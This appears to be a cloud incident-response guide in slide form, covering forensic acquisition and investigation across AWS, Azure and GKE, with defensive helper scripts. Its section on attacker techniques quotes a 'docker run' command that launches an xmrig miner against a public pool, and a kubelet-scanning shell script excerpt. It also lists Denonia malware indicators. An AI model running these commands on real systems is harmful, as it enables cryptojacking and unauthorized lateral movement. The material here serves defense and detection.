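            ids.update(r["Id"] for r in f.get("Resources", []))
    return sorted(ids)


# Illustrative findings; titles and resource IDs are made up.
sample_findings = [
    {"Title": "Example finding A", "Severity": {"Label": "HIGH"},
     "Resources": [{"Type": "AwsEc2Instance", "Id": "i-0example"}]},
    {"Title": "Example finding B", "Severity": {"Label": "LOW"},
     "Resources": [{"Type": "AwsS3Bucket", "Id": "arn:aws:s3:::example-bucket"}]},
    {"Title": "Example finding C", "Severity": {"Label": "HIGH"},
     "Resources": [{"Type": "AwsIamRole", "Id": "arn:aws:iam::111122223333:role/example"}]},
]

print(count_by_severity(sample_findings))
print(resources_with_label(sample_findings, "HIGH"))
```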
124. How does the Security Hub Flow work?
https://d1.awsstatic.com/partner-network/Security-Hub-Partner-Onboarding-Deck.pdf
125. What are Security Hub Standards & Controls?
https://www.stormit.cloud/blog/aws-security-hub/
https://aws.amazon.com/blogs/aws/aws-security-hub-now-generally-available/
126. What are Findings & Insights?
https://aws.amazon.com/blogs/aws/aws-security-hub-now-generally-available/
127. What Integrations are there?
https://aws.amazon.com/blogs/aws/aws-security-hub-now-generally-available/
128. What Custom Actions are there?
https://aws.amazon.com/blogs/aws/aws-security-hub-now-generally-available/
132. What Official AWS Resources are there?
AWS provides a number of experimental solutions to help isolate, preserve and analyze compromised EC2 systems.
A few key ones to play with include:
● “Solution for AWS Cloud for Incident Response in EC2 instances”
This is a CloudFormation deployment that quarantines EC2 systems via SSM commands on the hosts themselves, performs security
group changes, and snapshots EBS volumes.
● “Automated Incident Response with SSM”
Another solution that uses SSM that can also quarantine EC2 systems,
but is based on the outcome of GuardDuty events.
● “Automated Incident Response and Forensics Framework”
A set of Security Hub actions to acquire data from EC2 systems.
● “Automated Forensics Orchestrator for Amazon EC2”
A more recent CloudFormation deployment that acquires data from EC2 systems, then points you to the free SANS SIFT Linux
distribution for command-line analysis at the raw disk level.
● “EC2 Auto Clean Room Forensics”
A CloudFormation deployment that will run the open-source fls tool to dump
file timestamps from files found on a compromised EC2 system.
133. What other Resources are there?
Community Resources
SANS has published a whitepaper titled “Digital Forensic Analysis of Amazon Linux EC2 Instances”.
A number of tools for AWS were released at Black Hat 2016.
Whilst a little dated now, there are useful tools in the ThreatResponse GitHub repository for preserving
forensic artifacts from EC2 instances, as well as isolating them and associated IAM credentials.
Cado Security Resources
We’ve published a video tutorial on YouTube on how to investigate a compromised EC2 instance. You can use
Cado Response to import potentially compromised EC2 systems in a single click for investigation.
Alternatively, if you’ve set up an automated response framework that drives the API, you can capture data
immediately following detection to reduce the Mean Time to Respond (MTTR).
134. How do you perform EC2 Isolation?
https://owasp.org/www-chapter-london/assets/slides/OWASPLondon-IR-In-Your-Pyjamas-Paco-Hope-20190213-PDF.pdf
135. How can you automate the Response to EC2 GuardDuty Alerts with Cado?
142. How do you respond to a compromised EKS Container or Node?
If you’ve identified a potentially compromised container in EKS, there are two potential ways forward:
● If the container is running on an underlying EC2, then refer to the suggested steps above for immediate actions.
● If the container is running on Fargate, then collect any data required for later analysis before subsequently
suspending it.
143. GuardDuty now supports EKS
https://aws.amazon.com/blogs/security/how-to-use-new-amazon-guardduty-eks-protection-findings/
https://medium.com/@cloud_tips/guide-to-aws-guardduty-findings-in-eks-62babbd7da88
144. GuardDuty now supports EKS
From “Enhanced threat detection for Amazon EKS with Amazon GuardDuty- AWS Online Tech Talks”
145. Container Investigation Data Sources in AWS
Amazon S3
CloudTrail Logs
● Shows: API Level Calls
● Usefulness: Low
● Collected by: S3
EKS Audit / Control Plane Logs
● Shows: API Level Calls
● Usefulness: Medium
● Collected by: S3
Amazon EC2 - Hosting EKS/ECS
Docker Logs
● Logs what containers were started, stopped
● Usefulness: Medium
● Collected by: EC2 Import or Cado Host
Docker Container Filesystems
● Normally overlay2 versioned filesystem
● Contains all the files from all the containers
● Usefulness: High
● Collected by: EC2 EBS (API) or Cado Host (SSM/SSH)
Inside Container - EKS/ECS on Fargate/EC2
Container Filesystems
● Live filesystem as seen by the container, Memory
● Contains all the files from all the containers
● Usefulness: Very High
● Collected by: Cado Host (ECS Exec/kubectl exec)
146. How do you Acquire an Amazon EKS System in Cado?
147. What is overlay2?
Overlay2 is the file system you are most likely to see.
It’s also versioned, which helps preserve evidence of attacks.
Separate containers are kept in their own folders:
148. What AWS EKS Logs are Stored in AWS?
It's important to also analyze AWS logs that are generated for EKS systems.
These contain metadata around starting and stopping containers.
Below you can see a view of AWS logs collected in Cado Response:
149. What Resources are available?
Community Resources
kube-forensics allows a cluster administrator to dump the current state of a running pod and all its containers
so that security professionals can perform offline forensic analysis.
https://github.com/keikoproj/kube-forensics
Cado Security Resources
We previously published a playbook dedicated to investigating compromises in EKS environments. Check out the
GitHub repository with sample data taken from a compromised EKS system, and an associated talk on how to analyze it.
https://offers.cadosecurity.com/the-ultimate-guide-to-docker-and-kubernetes-incident-response
https://github.com/cado-security/AWS_EKS_Cluster_Forensics
https://www.brighttalk.com/webcast/19071/502974
150. What Remediation is available?
https://aws.amazon.com/blogs/security/how-to-investigate-and-take-action-on-security-issues-in-amazon-eks-clusters-with-amazon-detective-part-2/
154. How does GuardDuty work with ECS?
https://docs.aws.amazon.com/guardduty/latest/ug/findings-malware-protection.html
156. How do you Acquire an Amazon ECS System in Cado?
157. How do you Investigate an ECS Container in Cado?
https://docs.cadosecurity.com/cado-response/discovery-import/import/aws/aws-ecs
Requires enableExecuteCommand to be enabled on the ECS service or task (ECS Exec)
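Because acquisition depends on enableExecuteCommand, it can help to check ahead of an incident which services have it switched on. The sketch below is one possible approach: it assumes you have already saved the JSON output of `aws ecs describe-services` and parsed it into a dictionary. The function name and the sample service names are hypothetical.

```python
from typing import Any, Dict, List


def services_without_exec(describe_services_response: Dict[str, Any]) -> List[str]:
    """Return names of ECS services where enableExecuteCommand is not true."""
    return [
        service.get("serviceName", "<unnamed>")
        for service in describe_services_response.get("services", [])
        if not service.get("enableExecuteCommand", False)
    ]


if __name__ == "__main__":
    # Hypothetical, trimmed-down response for illustration only.
    sample = {
        "services": [
            {"serviceName": "web", "enableExecuteCommand": True},
            {"serviceName": "worker", "enableExecuteCommand": False},
        ]
    }
    print(services_without_exec(sample))
```

Services reported by this check would need ECS Exec enabled before their running containers could be reached this way.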
158. How do you Remediate a compromised ECS Cluster?
https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_remediate.html#compromised-ecs
164. Denonia
● “python”
● DNS over HTTPS
● Custom Monero server 116.203.4.0:3333
● Runs XMRig from memory
● Writes config to hidden file at /tmp/.config.json
https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/
165. How do you Acquire a Lambda function in Cado?
166. How do you analyze Lambda in Cado?
https://www.cadosecurity.com/aws-lambda-incident-response/
168. How do you use Lambda for Incident Response?
https://www.cadosecurity.com/automated-analysis-of-critical-cloud-infrastructure-with-cado-and-aws-lambda/
176. How can you prepare for an incident in Azure?
Know Your Data
Identify your crown jewels. Do you have particularly sensitive information, like Personally Identifiable Information (PII) or Payment
Card Industry (PCI) data?
If so, you need to know exactly where it lives and what systems process the data. This also includes any backups or logs that might
shadow the original data.
Have Backups, And Test They Work
A disaster recovery plan can mitigate not just security incidents like ransomware, but also other likely events such as data center
hardware failure. Ransomware is a high risk due to both high impact and relatively high likelihood of occurrence.
Restrict Administrative Accounts
In general, follow the principle of least privilege. In particular, Microsoft provides detailed advice on how to secure administrative
accounts in Azure AD.
Require Multi-Factor Authentication for all User Accounts
177. How can you prepare for an incident in Azure?
Review Azure Security Center Settings
Azure Security Center is a centralized view of both security issues and configuration options. Unfortunately, many of the most useful features need
to be enabled (at cost) in advance of any breach.
Limit Network and Remote Access
Limit any connectivity to the internet from your machines as much as possible. A common security issue in Azure is Windows machines with RDP
accessible from the internet. This can put you at particular risk of brute-force ransomware attacks.
Encryption
The general advice is to ensure data is always encrypted at rest and in transit. There are open discussions around how useful encrypting data at
rest is with some cloud services. However, you may have particular requirements here if you are in a regulated industry such as finance or
healthcare.
Enable Logging
“Forensic readiness” will help you not only detect incidents earlier but also make investigations more thorough and efficient. As you can imagine,
the more useful data you have, the more likely you will be able to find the root cause of an incident. Ensuring you have the right logs enabled can
make all the difference.
178. Understand the Environment
It is important to gain an understanding of the environment in which the incident occurred.
If you are an internal SOC, you may already know the answers to these questions in advance of an incident:
● Where is sensitive data stored?
● How are users connected to Azure Active Directory?
● Who are the administrators?
● Where are logs stored?
● What Azure Products and Services are in use?
● Is Active Directory connected to on-premises systems or Microsoft 365?
179. Investigating Active Directory
Azure Active Directory (Azure AD) is Microsoft’s cloud-based identity and access management service. It combines core
directory services, application access management, and identity protection into a single solution. It enables single sign-on and
multi-factor authentication to help protect users from password fatigue and phishing attacks. It also provides group
management and device management capabilities.
When responding to an incident:
● Identify highly privileged users by using the Azure Portal and Azure Graph
● Identify which applications AD provides authentication for
● Identify and deactivate potentially compromised user accounts
● Identify and disable legacy authentication methods
Will Oram has made a great guide on how to specifically respond to incidents involving Azure Active Directory.
https://github.com/WillOram/AzureAD-incident-response
180. Logging in Azure
Azure has a number of different logs, including:
● Activity Logs: Management events against your subscription e.g., creating a Virtual Machine. Retrieve from the Azure Monitor>Activity
Log Service.
● Resource Logs: Data plane events, for example, retrieving a key from a store. Enabled from Diagnostic settings.
● Azure Active Directory Logs: User events and other things generally operated by AD. Enabled from AD > Diagnostic Settings.
● Windows Azure Diagnostics: Logs collected from inside the host. These can be forwarded to your SIEM.
● Application Logs: General application health and performance.
● Storage Analytics Logs: Specific to the storage service.
● Network Security Group Flow Logs: Records of IP traffic allowed or denied by a network security group.
● Security Center: Alerts from potentially malicious events.
See also:
https://www.datadoghq.com/blog/monitoring-azure-platform-logs/
https://ponderthebits.com/wp-content/uploads/2020/02/Logging-in-the-Cloud-From-Zero-to-Incident-Response-Hero-Public.pdf
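As one illustration of working with the Activity Logs listed above, the sketch below filters exported events for Virtual Machine creation or updates. It is a rough example under stated assumptions: the events are assumed to be the parsed JSON output of `az monitor activity-log list`, with the `operationName.value`, `caller` and `eventTimestamp` fields. The function name and sample values are hypothetical.

```python
from typing import Any, Dict, Iterable, List

VM_WRITE_OPERATION = "microsoft.compute/virtualmachines/write"


def vm_write_events(events: Iterable[Dict[str, Any]]) -> List[Dict[str, str]]:
    """Keep Activity Log events that create or update a Virtual Machine."""
    hits = []
    for event in events:
        operation = (event.get("operationName") or {}).get("value", "")
        # Operation names are compared case-insensitively.
        if operation.lower() == VM_WRITE_OPERATION:
            hits.append({
                "time": event.get("eventTimestamp", ""),
                "caller": event.get("caller", ""),
                "operation": operation,
            })
    return hits


if __name__ == "__main__":
    # Hypothetical events for illustration only.
    sample = [
        {"eventTimestamp": "2023-01-01T10:00:00Z", "caller": "admin@example.com",
         "operationName": {"value": "Microsoft.Compute/virtualMachines/write"}},
        {"eventTimestamp": "2023-01-01T10:05:00Z", "caller": "admin@example.com",
         "operationName": {"value": "Microsoft.Storage/storageAccounts/listKeys/action"}},
    ]
    for hit in vm_write_events(sample):
        print(hit)
```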
181. Open Source Tools
The community has created a number of tools that may be of use when
responding to incidents in Azure:
● Azure AD Incident Response PowerShell Module
● Sparrow (Identifies compromised accounts in AD)
● Mandiant Azure AD Investigator
● AzureHound (Collects data from Azure)
● Hawk (Retrieves data for Microsoft 365 Investigations)
● CrowdStrike Reporting Tool for Azure (Identifies possible issues)
● Cloud Forensic Utils (Retrieves forensic data from Virtual Machines)
182. Native Azure Tools
Microsoft provides advice on how to use the following platforms to investigate security incidents:
● Azure Security Center
https://azure.microsoft.com/en-gb/blog/how-azure-security-center-helps-analyze-attacks-using-investigation-and-log-search/
● Azure Sentinel
https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Training/Azure-Sentinel-Training-Lab/Modules/Module-4-Incident-Management.md
● Defender
https://learn.microsoft.com/en-us/microsoft-365/security/defender/incident-response-overview?view=o365-worldwide
185. Virtual Machines
Azure Virtual Machines (VMs) are a cloud computing service from Microsoft that enables users to create, configure,
and manage virtual machines in the cloud. VMs can be created from pre-configured images or from scratch and can
be configured to run a variety of operating systems and applications. Azure VMs are available in a variety of sizes
and can be scaled up or down to meet changing computing needs.
Azure provides the functionality to export the disk images of Virtual Machines in VHD format for forensic analysis.
This can be done by selecting the disk, then selecting Create Snapshot. This can also be done on the command
line using the az snapshot create command:
az snapshot create --name
                   --resource-group
                   [--accelerated-network {false, true}]
                   [--architecture {Arm64, x64}]
                   [--copy-start {false, true}]
                   [--disk-access]
                   [--disk-encryption-set]
                   [--edge-zone]
                   [--encryption-type {EncryptionAtRestWithCustomerKey, EncryptionAtRestWithPlatformAndCustomerKeys, EncryptionAtRestWithPlatformKey}]
                   [--for-upload {false, true}]
                   [--hyper-v-generation {V1, V2}]
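A minimal sketch of assembling an `az snapshot create` invocation is shown here. It uses only the two required arguments from the synopsis plus `--source`, which names the disk to snapshot. The function name and the snapshot, resource group and disk names are hypothetical placeholders; the command is built as an argument list and printed rather than run.

```python
import shlex
from typing import List


def build_az_snapshot_command(
    snapshot_name: str, resource_group: str, source_disk: str
) -> List[str]:
    """Build the argv for snapshotting a managed disk with the Azure CLI."""
    return [
        "az", "snapshot", "create",
        "--name", snapshot_name,
        "--resource-group", resource_group,
        # --source accepts the name or resource ID of the disk to snapshot.
        "--source", source_disk,
    ]


if __name__ == "__main__":
    # Hypothetical names for illustration only.
    command = build_az_snapshot_command("ir-snap-01", "ir-rg", "vm-os-disk")
    print(shlex.join(command))
```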
187. Creating a Snapshot for Forensics Manually
https://learn.microsoft.com/en-us/azure/virtual-machines/disks-incremental-snapshots?tabs=azure-cli
Also see SDK @ https://github.com/google/cloud-forensics-utils
192. AKS
Azure Kubernetes Service (AKS) is a managed Kubernetes service that lets you quickly deploy and manage
containerized applications in the cloud.
AKS reduces the complexity and operational overhead of managing Kubernetes by offloading much of that responsibility
to the Azure cloud.
As a hosted Kubernetes service, AKS is quickly becoming a popular choice for developers and enterprises that want to
deploy applications in containers.
193. Monitoring AKS with Sentinel
● Azure Security Center (ASC) AKS threat protection
● Azure Diagnostics logs
● Third party tool alert integration
https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/monitoring-azure-kubernetes-service-aks-with-microsoft-sentinel/ba-p/1583204
195. Acquiring AKS
Cado Response can collect the full contents of containers running on AKS by retrieving a copy of the container disk or
files over the Kubernetes Control plane using Cado Host:
217. Snapshot the VM's disk
https://cloud.google.com/kubernetes-engine/docs/how-to/security-mitigations
List the disks attached to the node:
gcloud compute instances describe NODE_NAME --zone COMPUTE_ZONE --format="flattened([disks])"
Look for the lines that contain disks[NUMBER].source. E.g.
disks[0].source: https://www.googleapis.com/compute/v1/projects/PROJECT_NAME/zones/COMPUTE_ZONE/disks/DISK_NAME
Create the snapshot with:
gcloud compute disks snapshot DISK_NAME
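The lookup step can be automated with a short parser. The sketch below assumes the flattened output puts each `disks[NUMBER].source` key and its URL on a single line, takes the last path segment as the disk name, and builds one snapshot command per disk. The function names are hypothetical, and passing `--zone` is a choice made here for explicitness.

```python
import re
from typing import List

# Matches lines such as: disks[0].source: https://.../disks/DISK_NAME
_SOURCE_LINE = re.compile(r"^disks\[\d+\]\.source:\s*(\S+)\s*$")


def disk_names_from_flattened(output: str) -> List[str]:
    """Extract disk names from `--format="flattened([disks])"` output."""
    names = []
    for line in output.splitlines():
        match = _SOURCE_LINE.match(line.strip())
        if match:
            # The disk name is the final path segment of the source URL.
            names.append(match.group(1).rsplit("/", 1)[-1])
    return names


def snapshot_commands(output: str, zone: str) -> List[List[str]]:
    """Build one `gcloud compute disks snapshot` argv per discovered disk."""
    return [
        ["gcloud", "compute", "disks", "snapshot", name, "--zone", zone]
        for name in disk_names_from_flattened(output)
    ]


if __name__ == "__main__":
    sample = (
        "disks[0].source: https://www.googleapis.com/compute/v1/projects/"
        "PROJECT_NAME/zones/COMPUTE_ZONE/disks/DISK_NAME\n"
        "disks[0].type: PERSISTENT\n"
    )
    for command in snapshot_commands(sample, "COMPUTE_ZONE"):
        print(" ".join(command))
```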
218. Inspect the VM while the workload continues to run
https://cloud.google.com/kubernetes-engine/docs/how-to/security-mitigations
By cordoning, draining, and limiting network access to the VM hosting a compromised container, you can partially isolate the
compromised container from the rest of your cluster.
Limiting access to the VM reduces risk but does not prevent an attacker from moving laterally in your environment if they
take advantage of a critical vulnerability.
Abandoning the VM prevents the node from being marked unhealthy and auto-repaired (re-created) before your investigation
is complete.
kubectl cordon NODE_NAME
kubectl label pods POD_NAME quarantine=true
kubectl drain NODE_NAME --pod-selector='!quarantine'
# Restrict network access
gcloud compute instance-groups managed abandon-instances INSTANCE_GROUP_NAME --instances=NODE_NAME
235. Building a Container Forensics Incident Response Plan
When building a container forensics incident response plan, there are three main focus areas to consider:
● Preventative Measures
● Preservation & Investigation
● Planning & Testing
236. Preventative Measures
Preventative measures can help reduce the risk of container compromise:
● Restrict access to kubectl and the Docker/Kubernetes APIs
● Ensure Kubernetes, Docker, and the containers running within them are
kept patched and up to date
● Create an allow-list for inbound and outbound network traffic
237. Preservation & Investigation
In the event an incident occurs, it is critical to preserve the evidence that’s required to allow for an
in-depth investigation:
● Never destroy a compromised node! Doing so can make it impossible to identify the root cause
● Determine which evidence you plan to capture and ensure it provides enough visibility to determine root
cause and impact. Remember, the more data sources you can analyze, the better your
investigation will be
● Have a plan for how to capture the data you need, and test your ability to capture it. Given the
dynamic and ephemeral nature of containers, automation is key
● Know how to snapshot the host that contains the containerized disks
238. Planning & Testing
As always, planning and testing are crucial to ensuring alignment and overall success in the event a
major incident occurs:
● Assign an incident response lead to serve as the primary decision maker during a major incident
● Determine which parts of the business you need to communicate with in the event a breach
occurs
● Understand what legal and/or customer obligations you have following a major incident
● Decide what’s considered a high-severity incident, and implement escalation processes and
procedures
● Conduct red team exercises and assessments to continuously improve your security defenses
and be best prepared for a real-world data breach
239. How Attackers are Compromising Containerized Systems
#1 Running Local Docker Commands
Below is an example command attackers use to start a malicious Docker container on a compromised host using the
“docker run” command:
docker run --name sosmsen2 --restart unless-stopped --read-only -m 50M bitnn/alpine-xmrig -o
stratum+tcp://xmr.crypto-pool.fr:3333 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p
x -k --donate-level=1
We often see attackers spin up the official xmrig Docker containers too.
In general, if you see a container running with “xmrig” in the name, it usually means an
investigation is required.
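The "xmrig in the name" rule of thumb can be turned into a quick triage check. The sketch below assumes container listings captured with `docker ps --format '{{json .}}'`, which emits one JSON object per line with `Names`, `Image` and `Command` fields. The marker list and function name are illustrative assumptions, and a match is only a lead for investigation, not proof of compromise.

```python
import json
from typing import List

# Illustrative markers taken from the example command above.
SUSPICIOUS_MARKERS = ("xmrig", "stratum+tcp://")


def suspicious_containers(docker_ps_json_lines: str) -> List[str]:
    """Return names of containers whose name, image or command hits a marker."""
    hits = []
    for line in docker_ps_json_lines.splitlines():
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)
        haystack = " ".join(
            str(record.get(key, "")) for key in ("Names", "Image", "Command")
        ).lower()
        if any(marker in haystack for marker in SUSPICIOUS_MARKERS):
            hits.append(str(record.get("Names", "")))
    return hits


if __name__ == "__main__":
    # Hypothetical listing for illustration only.
    listing = "\n".join([
        json.dumps({"Names": "sosmsen2", "Image": "bitnn/alpine-xmrig", "Command": "xmrig -o ..."}),
        json.dumps({"Names": "web", "Image": "nginx:stable", "Command": "nginx -g daemon off;"}),
    ])
    print(suspicious_containers(listing))
```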
240. #2 Exploiting the Kubernetes API
Below is an excerpt from a shell script attackers use to move laterally on a compromised network by finding open
kubelet APIs on the default ports 10250 and 10255:
kube_pwn(){
LRANGE=$1
rndstr=$(head /dev/urandom | tr -dc a-z | head -c 6 ; echo '')
eval "$rndstr"="'$(masscan --open -p10250 $LRANGE --rate=250000 | awk '{print $6}')'";
for ipaddr in ${!rndstr} ; do
if [ -f $TEMPFILE ]; then rm -f $TEMPFILE; fi
timeout -s SIGKILL $T1OUT curl -sLk https://$theip:10250/runningpods/ | jq -r '.items[] | .metadata.namespace + " " +
.metadata.name + " " + .spec.containers[].name' >> $TEMPFILE
.....
Early versions of Kubernetes provided limited default authentication options. Fortunately, this is no
longer the case.
However, it’s still important to ensure that access to the Kubernetes API is
restricted with a firewall at the network level and credentials are set on the host
itself.
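To verify that the network-level restriction is actually in place, you can test from an untrusted network segment whether the kubelet ports answer at all. The sketch below is a minimal reachability check for hosts you own or are authorized to assess. The function name and default timeout are assumptions, and a successful TCP connection only shows the port is reachable, not that it accepts unauthenticated requests.

```python
import socket
from typing import Dict, Iterable

# Default kubelet ports referenced in the attacker script above.
KUBELET_PORTS = (10250, 10255)


def check_ports(
    host: str, ports: Iterable[int] = KUBELET_PORTS, timeout: float = 1.0
) -> Dict[int, bool]:
    """Return {port: True/False} for whether a TCP connection succeeds."""
    results = {}
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                results[port] = True
        except OSError:
            # Covers refused connections, timeouts and unreachable hosts.
            results[port] = False
    return results


if __name__ == "__main__":
    # Checks the local machine only; substitute a node you are authorized to test.
    print(check_ports("127.0.0.1"))
```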
241. Investigating Compromises in Containerized Environments
Let’s say you’ve received an alert indicating the presence of Monero mining malware on a Kubernetes host.
First and foremost, it’s important to understand whether the compromise is in the host or
in the container/pod.
Below we’ll investigate a compromised Docker container using the overlay2 file system. The screenshots below
are captured from the Cado Response platform, but the filenames and forensic principles will map to other
toolsets:
243. Many coin miners exploit open Docker and Kubernetes APIs. The JSON format logs under /var/lib/docker/containers
may record access and execution. In the example log below, we can see an xmrig container spinning up:
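A rough way to triage these logs outside of any platform is sketched below. It assumes Docker's default json-file logging driver, where each line is a JSON object with `log`, `stream` and `time` fields, and flags entries that mention mining-related strings. The marker list, function name and sample lines are hypothetical.

```python
import json
from typing import List, Sequence, Tuple


def suspicious_log_entries(
    log_text: str, markers: Sequence[str] = ("xmrig", "stratum+tcp://")
) -> List[Tuple[str, str]]:
    """Return (time, message) pairs for log entries containing a marker."""
    hits = []
    for raw_line in log_text.splitlines():
        try:
            entry = json.loads(raw_line)
        except json.JSONDecodeError:
            continue  # Skip blank or truncated lines rather than failing.
        if not isinstance(entry, dict):
            continue
        message = str(entry.get("log", ""))
        if any(marker in message.lower() for marker in markers):
            hits.append((str(entry.get("time", "")), message.rstrip("\n")))
    return hits


if __name__ == "__main__":
    # Hypothetical log lines for illustration only.
    sample = "\n".join([
        json.dumps({"log": "starting service\n", "stream": "stdout", "time": "2023-01-01T00:00:00Z"}),
        json.dumps({"log": "use pool stratum+tcp://pool.example:3333\n", "stream": "stdout", "time": "2023-01-01T00:00:05Z"}),
    ])
    for when, message in suspicious_log_entries(sample):
        print(when, message)
```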
244. A Brief Introduction to the Docker File System
Docker supports a number of storage drivers:
● overlay2 is the one you will most commonly see. You will be able to identify it by the name
"overlay2" in the folder names
● aufs was the preferred driver in Docker 18.06 and older
● fuse-overlayfs is used for Rootless Docker on older hosts
● devicemapper is used for older versions of CentOS and Red Hat
● btrfs and zfs are used for enterprise deployments with more complicated snapshotting
requirements
● vfs is used in testing
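When working through a disk image, the driver can often be inferred from the path of an artifact. The sketch below assumes the default Docker data root of /var/lib/docker, where each storage driver keeps its data in a directory named after the driver. Rootless or customised installs use a different root, so `docker_root` is a parameter; the function name is hypothetical.

```python
from pathlib import PurePosixPath
from typing import Optional

# Driver names from the list above.
STORAGE_DRIVERS = (
    "overlay2", "aufs", "fuse-overlayfs", "devicemapper", "btrfs", "zfs", "vfs",
)


def storage_driver_from_path(
    path: str, docker_root: str = "/var/lib/docker"
) -> Optional[str]:
    """Return the storage driver a path belongs to, or None if it has none."""
    try:
        relative = PurePosixPath(path).relative_to(docker_root)
    except ValueError:
        return None  # The path is not under the Docker data root.
    first = relative.parts[0] if relative.parts else ""
    return first if first in STORAGE_DRIVERS else None


if __name__ == "__main__":
    # Hypothetical artifact path for illustration only.
    print(storage_driver_from_path("/var/lib/docker/overlay2/abc123/diff/tmp/payload"))
```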
245. overlay2
Overlay2 is the file system you are most likely to see.
It’s also versioned, which helps preserve evidence of attacks.
Separate containers are kept in their own folders:
246. AWS EKS Logs Stored in AWS
It's important to also analyze AWS logs that are generated for EKS systems.
These contain metadata around starting and stopping containers.
Below you can see a view of AWS logs collected in Cado Response: